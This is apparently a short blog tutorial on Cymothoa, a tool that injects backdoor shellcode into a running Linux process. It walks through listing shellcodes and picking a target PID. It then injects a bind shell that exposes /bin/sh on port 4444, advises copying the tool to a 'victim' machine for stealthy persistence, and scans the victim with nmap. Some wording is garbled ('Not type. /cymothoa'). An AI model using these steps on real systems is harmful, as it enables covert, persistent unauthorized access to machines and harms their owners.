Cymothoa – Runtime shellcode injection Backdoors

Cymothoa is a stealth backdooring tool, that inject backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them. But keep in mind it’s a runtime injector so it only works on applications that are already running.

Open your backtrack terminal and type cd /pentest/backdoors/cymothoa

Not type. /cymothoa

The main syntax is:  ./cymothoa –p <pid> -s <shellcode_number> [options]

Now type. /cymothoa –S for list of all available shellcodes

To try to infect a currently running process I run to see a list of life processes type ps –aux

I try to launch a version of dictionary to attach on to. /cymothoa –p 1510 –s 0 –y 4444

-p   process ID  1510
-s shell code number 0 bind /bin/sh to the provided port (requires -y)
-4444 that will open up a shell on port 4444

You can potentially inject any type of backdoor into any program or application of the system. Because it’s a realtime process, it only works on systems you have access to. Once compromised, Cymothoa should be copied to the victim machine to generate stealthy backdoor shells.

Now scan pc with nmap: nmap –sV 192.168.1.3 (Victim IP)

Leave a Reply

Your email address will not be published. Required fields are marked *